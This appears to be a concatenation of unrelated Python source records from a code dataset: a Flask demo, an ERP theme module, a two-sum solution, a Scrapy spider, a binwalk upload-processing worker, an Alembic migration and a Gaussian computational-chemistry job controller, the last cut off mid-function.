pd 1\n#K<n> -- <Title/Topic/Summary>\n#2019-09-<dd> \n\nfrom flask import Flask, render_template\napp = Flask(__name__) #create instance of class Flask\n\n@app.route(\"/\")\n #assign following fxn to run when root route requested\ndef hello_world():\n print(__name__) #where will this go?\n return \"No hablo queso!\"\n\ncoll = {0,1,2,3}\n\n@app.route(\"/my_foist_template\")\ndef test_tmplt():\n return render_template(\n 'model_tmplt.html',\n foo=\"foooo\",\n collection=coll\n )\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","sub_path":"fall/09_stat/flaskApp.py","file_name":"flaskApp.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"450374502","text":"# --------------------------------------------------------------------------- #\n# Copyright (c) William Moreno Reyes <williamjmorenor at gmail.com> #\n# This file is part of expresoERP and is distributed under the MIT License. #\n# See LICENSE file or copy at http://opensource.org/licenses/MIT #\n# --------------------------------------------------------------------------- #\n\n\"\"\"Default theme for expreso ERP Workstation.\"\"\"\n\n# Standard library imports:\nfrom os.path import dirname, realpath, join\n\n# Third party libraries imports:\n\n# Local imports:\n\n# <-------------------------------------------------------------------------> #\n# System wide definitions:\n__title__ = \"eERP-theme-default\"\n__version__ = \"0.1.0rc11\"\n__license__ = \"MIT License\"\n__copyright__ = \"Copyright (c) 2016 William Moreno Reyes\"\n__summary__ = \"Accounting system for SMEs\"\n__uri__ = \"expresoerp.github.io\"\n__author__ = \"William Moreno Reyes\"\n__email__ = \"williamjmorenor at gmail.com\"\n\n# <-------------------------------------------------------------------------> #\n# Define local path:\n__here__ = dirname(realpath(__file__))\n\n# <-------------------------------------------------------------------------> #\n# Define theme here:\ntheme = {\n \"database-setup\": join(__here__, \"artwork/database.png\"),\n \"login-icon\": join(__here__, \"artwork/secure-server.png\"),\n \"mariabd\": join(__here__, \"artwork/mariadb.png\"),\n \"postgresql\": join(__here__, \"artwork/postgresql.png\"),\n \"sqlite\": join(__here__, \"artwork/sqlite.png\"),\n \"sql-server\": join(__here__, \"artwork/sqlserver.png\"),\n \"wizard-banner\": join(__here__, \"artwork/wizard_banner.jpg\"),\n \"wizard-top\": join(__here__, \"artwork/wizard_top.png\")\n}\n","sub_path":"default/build/lib/eERP_theme_default/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"381662402","text":"# coding=utf-8\nfrom flask import Flask\nfrom .database import db, models\nfrom . import routes\n\n\ndef create_app(config_filename=None):\n app = Flask(__name__)\n if config_filename is not None:\n app.config.from_pyfile(config_filename) # 初始化配置文件\n configure_database(app) # 初始化数据库\n routes.init(app) # 初始化路由 全局拦截器 蓝图加载\n\n return app\n\n\ndef configure_database(app):\n db.app = app\n db.init_app(app)\n models.init(db) # 创建数据库表\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"176353273","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n if (target - nums[i]) in nums:\n index = nums.index(target - nums[i])\n if i != index:\n if i < index:\n return [i + 1, index + 1]\n else:\n return [index + 1, i + 1]\n\n else:\n raise Exception(\"No Solution!\")\n\n\nnumbers = [2, 7, 11, 15]\ntarget = 9\nso = Solution()\nprint(so.twoSum(numbers, target))\n","sub_path":"Python/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"451641636","text":"import scrapy\n\nfrom ..items import ItArticle\n\nclass TestSpider(scrapy.Spider):\n name = 'test7'\n allowed_domains = ['computerworld.com/news/']\n start_urls = ['https://www.computerworld.com/news/']\n\n def parse(self, response):\n \"\"\"\n :param : response\n :return : Request\n \"\"\"\n for url in response.css('div.post-cont h3 > a::attr(\"href\")').extract():\n self.logger.info('Response URL : %s' %response.urljoin(url))\n yield scrapy.Request('https://www.computerworld.com'+str(url), self.parse_article, dont_filter=True)\n\n\n def parse_article(self, response):\n print(\">>>>>>>>>>\", response)\n \"\"\"\n :param : response\n :return : items\n \"\"\"\n item = ItArticle()\n item['title'] = response.xpath('//h1[@itemprop=\"headline\"]/text()').get()\n item['img_url']= response.xpath('//figure[@itemprop=\"image\"]/img[@itemprop=\"contentUrl\"]/@data-original').get()\n item['contents'] =''.join(response.xpath('//div[@itemprop=\"articleBody\"]/p/text()').getall())\n\n print(\"=======================\")\n print(dict(item))\n print(\"=======================\")\n\n\n yield item","sub_path":"crawling/scrapy/section03_05/section03_05/spiders/class03_5.py","file_name":"class03_5.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"363455118","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport json\nimport os\nfrom threading import Thread\nimport time\nfrom filelock import FileLock\nfrom utils import cmd_exec\nfrom config import DELAY_CHECK, UPLOAD_FOLDER\n\nRUNNING = []\n\nclass Binwalk(Thread):\n\n def __init__(self, folder, config):\n Thread.__init__(self)\n self.folder = folder\n self.config = config\n\n def set_config_status(self, status):\n with FileLock(f\"{self.folder}/config.json.lock\"):\n with open(f\"{self.folder}/config.json\", \"r\") as jsonFile:\n config = json.load(jsonFile)\n config[\"status\"][\"binwalk\"] = status\n with open(f\"{self.folder}/config.json\", \"w\") as jsonFile:\n json.dump(config, jsonFile)\n\n def run(self):\n self.set_config_status(\"running\")\n # First verify if we do not already compute for original image\n md5_image = self.config[\"md5_image\"]\n if self.config[\"md5_image\"] != self.config[\"md5_full\"] \\\n and os.path.isfile(f\"{UPLOAD_FOLDER}/{md5_image}/binwalk.7z\") \\\n and os.path.isfile(f\"{UPLOAD_FOLDER}/{md5_image}/binwalk.txt\") :\n cmd_exec(f\"cp {UPLOAD_FOLDER}/{md5_image}/binwalk.7z {self.folder}/binwalk.7z\")\n cmd_exec(f\"cp {UPLOAD_FOLDER}/{md5_image}/binwalk.txt {self.folder}/binwalk.txt\")\n else: # Else compute\n image = self.config[\"image\"]\n c_input = f\"{self.folder}/{image}\" # image.png\n output = cmd_exec(f\"binwalk -e . -C {self.folder}/binwalk --dd='.*' {c_input} --run-as=root 2>&1\")\n cmd_exec(f\"7z a {self.folder}/binwalk.7z {self.folder}/binwalk/*/*\")\n cmd_exec(f\"rm -r {self.folder}/binwalk\")\n with open(f\"{self.folder}/binwalk.txt\", \"w\") as f:\n f.write(output)\n global RUNNING\n RUNNING.remove(self.folder)\n self.set_config_status(\"finished\")\n\nwhile True:\n dirs = os.listdir(UPLOAD_FOLDER)\n for d in dirs:\n try:\n d = f\"{UPLOAD_FOLDER}/{d}\"\n if d in RUNNING or not os.path.isdir(d) or not os.path.isfile(f\"{d}/config.json\"):\n continue\n with open(f\"{d}/config.json\", \"r\") as jsonFile:\n config = json.load(jsonFile)\n if \"binwalk\" not in config[\"status\"]:\n RUNNING.append(d)\n Binwalk(d, config).start() # Run binwalk on folder\n except:\n continue\n time.sleep(DELAY_CHECK)\n","sub_path":"backend/binwalk.py","file_name":"binwalk.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"441427922","text":"\"\"\"removed project_id fk from Upload model\n\nRevision ID: 0bf9f0276ff8\nRevises: ba8709fd7e32\nCreate Date: 2017-03-21 18:43:46.613183\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0bf9f0276ff8'\ndown_revision = 'ba8709fd7e32'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(u'upload_project_id_fkey', 'upload', type_='foreignkey')\n op.drop_column('upload', 'project_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('upload', sa.Column('project_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key(u'upload_project_id_fkey', 'upload', 'project', ['project_id'], ['id'])\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/0bf9f0276ff8_removed_project_id_fk_from_upload_model.py","file_name":"0bf9f0276ff8_removed_project_id_fk_from_upload_model.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"619964137","text":"import os\nimport re\nimport shutil\nfrom time import sleep\nclass GaussianJobControl():\n\n def __init__(self,cores,cpu_cores,user,root_dir,gdb,gdb_done,gdb_error,molsfile_dir):\n '''\n the initialise function \n self.cores: the number of cpu that every job use\n self.cpu_cores: the max number of cpu that machine have or jobs that user define\n self.root_dir: the dir that contains the gdb dir, gdb_done dir, gdb_error dir and molsfile_dir\n self.gdb: jobs in calculating are included in variable gdb\n self.gdb_done: jobs done are included in variable gdb_done\n self.gdb_error: jobs with error are included in variable gdb_error \n self.molsfile_dir: all mols files are included in variable molsfile_dir\n self.user: user name who submit the calculation jobs\n '''\n self.cores = cores \n self.cpu_cores = cpu_cores \n self.root_dir = root_dir \n self.gdb = gdb\n self.gdb_done = gdb_done\n self.gdb_error = gdb_error\n self.molsfile_dir = molsfile_dir \n self.user = user \n\n def __generate_folders(self,molecular_dir):\n '''\n generate all the foders needed in the calculation process\n '''\n dirs = molecular_dir+'/s0'\n os.chdir(molecular_dir)\n if not os.path.exists(dirs):\n os.mkdir('s0')\n dirs = molecular_dir+'/s1'\n if not os.path.exists(dirs):\n os.mkdir('s1')\n dirs = molecular_dir+'/t1'\n if not os.path.exists(dirs):\n os.mkdir('t1')\n dirs = molecular_dir+'/nacme'\n if not os.path.exists(dirs):\n os.mkdir('nacme')\n dirs = molecular_dir+'/numfraq'\n if not os.path.exists(dirs):\n os.mkdir('numfraq')\n dirs = molecular_dir+'/optic'\n if not os.path.exists(dirs):\n os.mkdir('optic')\n \n if not os.path.exists(self.molsfile_dir):\n os.mkdir(self.molsfile_dir)\n \n if not os.path.exists(self.gdb_done):\n os.mkdir(self.gdb_done)\n \n if not os.path.exists(self.gdb_error):\n os.mkdir(self.gdb_error)\n \n def __generate_input(self,files,dirs,states):\n '''\n the fuction do the follow three steps for a molecular :\n 1. generate input file needed by gaussian software\n 2. generate pbs file to submit the calulation job\n 3. submit the job\n parameters :\n files represent .xyz file name of a molecular\n dirs represent dir in which different calulation job resided \n states represent different calculation job\n '''\n out_dir = os.path.join(dirs,states)\n g09_parameters = []\n memories = '4'\n temp = files.split('.')\n pbs_name = temp[0]\n input_file = temp[0]+'_'+states+'.com'\n input_pbs = temp[0]+'_'+states+'.pbs'\n out_chk = temp[0]+'_'+states+'.chk'\n out_log = temp[0]+'_'+states+'.log'\n temp = temp[0].split('_')\n molecular = temp[1]\n pp = 'B3LYP'\n if states == 's0':\n compute_para2 = '0 1'\n compute_para1 = '#p opt B3LYP/6-31G* freq'\n if states == 's1':\n compute_para2 = '0 1'\n compute_para1 = '#p opt td B3LYP/6-31G* freq'\n if states == 't1':\n compute_para2 = '0 3'\n compute_para1 = '#p opt B3LYP/6-31G* freq'\n g09_parameters.append(out_chk)\n g09_parameters.append(memories)\n g09_parameters.append(self.cores)\n g09_parameters.append(compute_para1)\n g09_parameters.append(molecular)\n g09_parameters.append(pp)\n g09_parameters.append(compute_para2)\n g09_parameters.append(input_file)\n g09_parameters.append(out_log)\n g09_parameters.append(pbs_name)\n g09_parameters.append(input_pbs)\n \n \n with open(files,'r') as in_object:\n coodinates = []\n while 1:\n line = in_object.readline()\n if not line:\n break\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(.*)){4}',line)\n if res:\n coodinates.append(line)\n os.chdir(out_dir)\n with open(g09_parameters[7],'w') as out_object:\n out_object.write('%chk='+g09_parameters[0])\n out_object.write('\\n')\n out_object.write('%mem='+g09_parameters[1]+'GB') \n out_object.write('\\n')\n out_object.write('%nprocshared='+g09_parameters[2])\n out_object.write('\\n')\n out_object.write(g09_parameters[3])\n out_object.write('\\n')\n out_object.write('\\n')\n out_object.write(g09_parameters[4]+' optimization with '+g09_parameters[5])\n out_object.write('\\n')\n out_object.write('\\n')\n out_object.write(g09_parameters[6])\n out_object.write('\\n')\n for line in coodinates:\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(\\s*)){4}',line)\n if res:\n temp = line.split('\\t')\n out_object.write(temp[0])\n out_object.write(' ')\n if float(temp[1]) < 0:\n out_object.write('%.10f' % float(temp[1]))\n else:\n out_object.write(' ')\n out_object.write('%.10f' % float(temp[1]))\n out_object.write(' ')\n if float(temp[2]) < 0:\n out_object.write('%.10f' % float(temp[2]))\n else:\n out_object.write(' ')\n out_object.write('%.10f' % float(temp[2]))\n out_object.write(' ')\n if float(temp[3]) < 0:\n out_object.write('%.10f' % float(temp[3]))\n else:\n out_object.write(' ')\n out_object.write('%.10f' % float(temp[3]))\n out_object.write('\\n')\n else:\n shutil.move(dirs,self.gdb_error)\n return\n out_object.write('\\n')\n with open(g09_parameters[10],'w') as out_object:\n out_object.write('#PBS -S /bin/bash\\n')\n out_object.write('#PBS -N'+' '+g09_parameters[9]+'\\n')\n out_object.write('#PBS -l nodes=1:ppn='+g09_parameters[2]+'\\n')\n out_object.write('#PBS -l walltime=100000:00:00\\n')\n out_object.write('cd $PBS_O_WORKDIR\\n')\n out_object.write('g09 < '+g09_parameters[7]+'>'+g09_parameters[8]+'\\n')\n os.system('qsub '+g09_parameters[10])\n\n def submission_control(self):\n '''\n the fuction controls the submission process\n to ensure that only cpu_cores jobs are submitted\n '''\n joblog = self.root_dir + '/' + 'jobnumber' + '/' + 'job.log'\n for files in os.listdir(self.gdb):\n if os.path.isfile(os.path.join(self.gdb,files)):\n temp = files.split('.')\n molecular_dir = os.path.join(self.gdb,temp[0])\n \n os.chdir(self.gdb)\n os.mkdir(molecular_dir)\n shutil.move(files,molecular_dir)\n self.__generate_folders(molecular_dir)\n \n \n while 1:\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n b = int(a.read())\n if b<self.cpu_cores:\n if os.path.exists(molecular_dir):\n os.chdir(molecular_dir)\n self.__generate_input(files,molecular_dir,'s0')\n break\n sleep(30)\n sleep(2)\n \n while 1:\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n b = int(a.read())\n if b<self.cpu_cores:\n if os.path.exists(molecular_dir):\n os.chdir(molecular_dir)\n self.__generate_input(files,molecular_dir,'s1')\n break\n sleep(30)\n sleep(2)\n \n while 1:\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n b = int(a.read())\n if b<self.cpu_cores:\n if os.path.exists(molecular_dir):\n os.chdir(molecular_dir)\n self.__generate_input(files,molecular_dir,'t1')\n break\n sleep(30)\n sleep(2)\n\n def __str_to_13(self,vib):\n num = 13 - len(vib)\n temp = ' '*num\n return temp+vib\n\n def __parse_log_s0(self,fname,outfile,smiles):\n '''\n the function do the follow 2 steps : \n 1. parse the *_s0.log file to obtain different physical and chemical info\n 2. write the info to the *.mols file\n '''\n\n #begin to parse *.com file to obtain atom symbol, atom number and charge of molecular\n \n atom_syb = []\n temp = fname.split('.')\n fname1 = temp[0]+'.com'\n\n with open(fname1,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n #find charge value in .com file\n res = re.match(r'[0-9]\\s*[0-9]',line) \n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n #find atom symbol in .com file\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(.*)){3}',line)\n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n charge = atom_syb[0]\n atom_num = len(atom_syb)-1\n #end to parse *.com file\n \n base_name = os.path.basename(fname)\n temp = base_name.split('_')\n molecular = temp[1] #molecular symbol\n number = temp[0] #file number in gdb\n temp = []\n mulliken = []\n atom_pos = []\n atom_mass = []\n frequency = ''\n frequencies = []\n vibration = []\n #varible to store 17 basic properties\n res_list = [] \n #medium varibles\n res_list1 = []\n res_list2 = []\n res_list3 = []\n res_list4 = []\n res_list5 = []\n res_list6 = []\n res_list7 = []\n res_list8 = []\n res_list9 = []\n res_list10 = []\n res_list11 = []\n res_list12 = []\n res_list13 = []\n res_list14 = []\n i = 0\n\n #begin to parse *.log file \n\n with open(fname,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n res = re.match(r' Rotational constants',line)\n if res:\n res_list1.append(line)\n res = re.match(r' Dipole moment',line)\n if res:\n line = in_object.readline()\n #print line\n res_list2.append(line)\n res = re.match(r' Isotropic polarizability',line)\n if res:\n res_list3.append(line)\n res = re.match(r' Alpha',line)\n if res:\n res_list4.append(line)\n res = re.match(r' Electronic spatial extent',line)\n if res:\n res_list5.append(line)\n res = re.match(r' Zero-point vibrational energy',line)\n if res:\n line = in_object.readline()\n res_list6.append(line)\n res = re.match(r' SCF Done',line)\n if res:\n res_list7.append(line)\n res = re.match(r' Sum of electronic and zero-point Energies',line)\n if res:\n line = in_object.readline()\n res_list8.append(line)\n line = in_object.readline()\n res_list9.append(line)\n line = in_object.readline()\n res_list10.append(line)\n line = in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n res_list11.append(line)\n res = re.match(r'.*Standard orientation',line)\n if res:\n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline()\n j = 0\n while j < atom_num:\n res_list12.append(line)\n line = in_object.readline()\n j+=1\n res = re.match(r'.*Mulliken charges:',line)\n if res:\n line = in_object.readline()\n res_list13.append(line)\n j = 0\n while j < atom_num:\n res_list13.append(line)\n line = in_object.readline()\n j+=1\n res = re.match(r'.*Frequencies',line)\n if res:\n frequency = ''\n res_list15 = []\n str1 = re.compile(r'-*\\d+\\.\\d+')\n temp = str1.findall(line)\n for i in temp:\n frequency =i+' '+frequency\n #print frequency\n frequencies.append(frequency)\n line = in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n j = 0\n temp_list1 = []\n temp_list2 = []\n temp_list3 = []\n while j < atom_num:\n temp_list = []\n line = in_object.readline()\n str1 = re.compile(r'-*\\d+\\.\\d+')\n temp = str1.findall(line)\n #print temp\n if len(temp)/3 >= 1:\n temp_list.append(temp[0])\n temp_list.append(temp[1])\n temp_list.append(temp[2])\n temp_list1.append(temp_list)\n temp_list = []\n if len(temp)/3 >=2:\n temp_list.append(temp[3])\n temp_list.append(temp[4])\n temp_list.append(temp[5])\n temp_list2.append(temp_list)\n temp_list = []\n if len(temp)/3 ==3:\n temp_list.append(temp[6])\n temp_list.append(temp[7])\n temp_list.append(temp[8])\n temp_list3.append(temp_list)\n j+=1\n if temp_list1:\n vibration.append(temp_list1)\n if temp_list2: \n vibration.append(temp_list2)\n if temp_list3:\n vibration.append(temp_list3)\n #print vibration\n #find atom mass \n res = re.match(r'.*Temperature',line)\n if res:\n j = 0\n while j < atom_num:\n line = in_object.readline()\n res_list14.append(line)\n j+=1\n #end parse *.log file\n\n\n #begin to obtain ground state data from raw data \n\n if res_list12: \n for i in range(atom_num):\n atom_pos.append(res_list12[-1-i])\n\n str1 = re.compile(r'-*\\d+\\.\\d+')\n if res_list1:\n temp = str1.findall(res_list1[-1])\n for i in temp:\n res_list.append(i) #res_list[0],[1],[2] Rotational constant A B C\n if res_list2:\n temp = str1.findall(res_list2[-1])\n res_list.append(temp[-1]) #res_list[3] Dipole moment mu\n if res_list3:\n temp = str1.findall(res_list3[-1])\n res_list.append(temp[-1]) #res_list[4] Isotropic polarizability alpha\n if res_list4:\n temp = str1.findall(res_list4[-4])\n res_list.append(temp[-1]) #res_list[5] homo\n if res_list5:\n temp = str1.findall(res_list4[-3])\n res_list.append(temp[0]) #res_list[6] lomo\n lumo = float(res_list[-1])\n homo = float(res_list[-2])\n res_list.append(lumo-homo) #res_list[7] gap\n if res_list5:\n temp = str1.findall(res_list5[-1])\n res_list.append(temp[-1]) #res_list[8] r2\n if res_list6:\n temp = str1.findall(res_list6[-1])\n temp = float(temp[-1])/627.51\n temp = str(temp)\n res_list.append(temp) #res_list[9] zpve\n if res_list7:\n temp = str1.findall(res_list7[-1])\n res_list.append(temp[-1]) #res_list[10] SCF Done U0\n if res_list8:\n temp = str1.findall(res_list8[-1])\n res_list.append(temp[-1]) #res_list[11] \n if res_list9:\n temp = str1.findall(res_list9[-1])\n res_list.append(temp[-1])\n if res_list10:\n temp = str1.findall(res_list10[-1])\n res_list.append(temp[-1])\n if res_list11:\n temp = str1.findall(res_list11[-1])\n res_list.append(temp[-2])\n if res_list13:\n for i in range(atom_num):\n temp = res_list13[-1-i].split(' ')\n mulliken.append(temp[-1])\n if res_list14:\n for i in res_list14:\n temp = i.split(' ')\n atom_mass.append(temp[-1])\n #end obtain ground state data from raw data\n\n\n #begin to write properties to *.mols file\n\n with open(outfile,'w') as out_object:\n out_object.write('------------------------------Chemical Formula and Charge---------------------------------------------------------------\\n')\n out_object.write(' ')\n out_object.write(molecular+\" \"+charge+\"\\n\")\n out_object.write('------------------------------SMILES------------------------------------------------------------------------------------\\n')\n out_object.write(' '+smiles+'\\n')\n out_object.write('------------------------------Basic properties--------------------------------------------------------------------------\\n')\n out_object.write('--tag--index---A---B---C----dipole--isotropic--homo--lumo--gap--r2------zpve--U0--U--H--G--Cv---------------------------\\n')\n out_object.write('--xxx--XXXXXX--GHz-GHz-Ghz--Debye---Bohr^3-----Ha----Ha----Ha---Bohr^2--Ha----Ha--Ha-Ha-Ha-cal/(mol K)------------------\\n')\n out_object.write(' gdb '+number+' ')\n if res_list:\n for i in res_list:\n out_object.write('%.6f' % float(i))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Element,XYZ (Angstrom)--------------------------------------------------------------------\\n')\n temp = str(atom_num)\n out_object.write(' '+temp+'\\n')\n str1 = re.compile(r'-*\\d+\\.*\\d*')\n if atom_pos:\n for i in range(atom_num):\n temp = str1.findall(atom_pos[-1-i])\n #print temp\n out_object.write(' '+atom_syb[i+1]+' ')\n if float(temp[3])<0:\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n if float(temp[4])<0:\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n if float(temp[5])<0:\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Mulliken Partial Charge (|e|)-------------------------------------------------------------\\n')\n if mulliken:\n for i in mulliken:\n out_object.write(' ')\n out_object.write('%.6f' % float(i))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Atom Mass (Relative atomic mass)----------------------------------------------------------\\n')\n if atom_mass:\n for i in atom_mass:\n out_object.write(' ')\n out_object.write('%.6f' % float(i))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Vibration Frequency (cm-1)----------------------------------------------------------------\\n')\n if frequencies:\n for i in frequencies:\n i=i.rstrip()\n temp = i.split(' ')\n for j in temp:\n t1 = '%.6f' % float(j)\n t1=self.__str_to_13(t1)\n out_object.write(' ')\n out_object.write(t1)\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Vibration Modes---------------------------------------------------------------------------\\n')\n if vibration:\n for i in vibration:\n for j in i:\n out_object.write(' ')\n for k in j:\n if float(k)<0:\n out_object.write('%.6f' % float(k))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(k))\n out_object.write(' ')\n out_object.write('\\n') \n\n #end write properties to *.mols file\n \n def __parse_log_s1t1(self,fname,states,outfile,tokens,note1,note2):\n '''\n the function do the follow 2 steps : \n 1. parse the *_s1.log or *_t1.log file to obtain different physical and chemical info\n 2. write the info to the *.mols file\n '''\n\n #begin to parse *.com file to obtain atom symbol, atom number and charge of molecular\n\n atom_syb = []\n temp = fname.split('.')\n fname1 = temp[0]+'.com'\n with open(fname1,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n #find charge value in .com file\n res = re.match(r'[0-9]\\s*[0-9]',line) \n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n #find atom symbol in .com file\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(.*)){3}',line)\n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n charge = atom_syb[0]\n atom_num = len(atom_syb)-1\n\n #end to parse *.com file\n\n atom_pos = []\n res_list1 = []\n res_list2 = []\n res_list3 = []\n with open(fname,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n if states == 's1':\n res = re.match(r' Total Energy',line)\n if states == 't1':\n res = re.match(r' SCF Done',line)\n if res:\n res_list1.append(line)\n res = re.match(r'.*Standard orientation',line)\n if res:\n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline()\n j = 0\n while j < atom_num:\n res_list2.append(line)\n line = in_object.readline()\n j+=1\n str1 = re.compile(r'-*\\d+\\.\\d+')\n if res_list1:\n temp = str1.findall(res_list1[-1])\n energy_s1 = temp[-1]\n if res_list2:\n for i in range(atom_num):\n atom_pos.append(res_list2[-1-i])\n \n with open(outfile,'a') as out_object:\n out_object.write(tokens)\n out_object.write(' '+energy_s1+note1+'\\n')\n out_object.write(note2+'\\n')\n str1 = re.compile(r'-*\\d+\\.*\\d*')\n if atom_pos:\n for i in range(atom_num):\n temp = str1.findall(atom_pos[-1-i])\n #print temp\n out_object.write(' '+atom_syb[i+1]+' ')\n if float(temp[3])<0:\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n if float(temp[4])<0:\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n if float(temp[5])<0:\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n out_object.write('\\n')\n\n def __parse_xyz(self,fname):\n '''\n parse *.xyz file to obtain SMILES\n '''\n\n with open(fname,'r') as in_object:\n lines = in_object.readlines()\n temp = lines[-2]\n temp = temp.split()\n return temp[0]\n\n def all_mol_dir(self):\n '''\n the function returns the file info including molecular folders and files\n in the gdb folder\n '''\n return os.listdir(self.gdb)\n\n def parse_logfile(self,mol_dir):\n '''\n the function will parse all the *.log file\n after calculation is done\n and write all the information to the *.mols file\n '''\n\n temp = self.gdb + '/' + mol_dir\n if os.path.isdir(temp):\n molecular_dir = self.gdb +'/' + mol_dir + '/'\n molsfile = self.gdb +'/'+mol_dir+'/'+mol_dir+'.mols'\n if not os.path.isfile(molsfile):\n fname = molecular_dir+mol_dir+'.xyz'\n smiles = self.__parse_xyz(fname)\n \n work_dir = molecular_dir+'s0/'\n os.system('cd '+work_dir)\n for files in os.listdir(work_dir):\n if re.match(r'.*\\.log',files):\n fname = files\n break\n if re.match(r'.*\\.log',fname):\n temp = fname.split('_')\n out_file = molecular_dir+temp[0]+'_'+temp[1]+'.mols'\n fname = work_dir + fname\n self.__parse_log_s0(fname,out_file,smiles)\n \n tokens = '------------------------------Excited State S1: energy(Ha),lifetime(au),structure(Angstrom)-----------------------------\\n'\n note1 = ' #S1'\n note2 = ' #S1 life'\n work_dir = molecular_dir+'/s1/'\n os.chdir(work_dir)\n for files in os.listdir(work_dir):\n if re.match(r'.*\\.log',files):\n fname = files\n break\n if re.match(r'.*\\.log',fname):\n fname = work_dir + fname\n self.__parse_log_s1t1(fname,'s1',out_file,tokens,note1,note2)\n \n tokens = '------------------------------Excited State T1: energy(Ha),lifetime(au),structure(Angstrom)-----------------------------\\n'\n note1 = ' #T1'\n note2 = ' #T1 life'\n work_dir = molecular_dir+'/t1/'\n os.chdir(work_dir)\n for files in os.listdir(work_dir):\n if re.match(r'.*\\.log',files):\n fname = files\n break\n if re.match(r'.*\\.log',fname):\n fname = work_dir + fname\n self.__parse_log_s1t1(fname,'t1',out_file,tokens,note1,note2)\n shutil.copy(molsfile,self.molsfile_dir)\n else:\n mosfile_in_dir = self.molsfile_dir+'/'+mol_dir+'.mols'\n if not os.path.isfile(mosfile_in_dir):\n shutil.copy(molsfile,self.molsfile_dir)\n\n def error_handle(self,mol_dir):\n '''\n the function handles the error calculations\n if the calculation of a molecular is termination by any error\n the function is called to handle it and return true.\n otherwise just return false.\n Notice: the error handle process just moves the error calculation folder \n to the gdb_error folder\n '''\n\n temp = self.gdb + '/' + mol_dir\n if os.path.isdir(temp):\n molsfile = self.gdb+'/'+mol_dir+'/'+mol_dir+'.mols'\n s0logfile = self.gdb+'/'+mol_dir+'/'+'s0'+'/'+mol_dir+'_s0.log'\n s1logfile = self.gdb+'/'+mol_dir+'/'+'s1'+'/'+mol_dir+'_s1.log'\n t1logfile = self.gdb+'/'+mol_dir+'/'+'t1'+'/'+mol_dir+'_t1.log'\n s0errorinfo = ''\n s1errorinfo = ''\n t1errorinfo = ''\n mol_dir = self.gdb+'/'+mol_dir\n if not 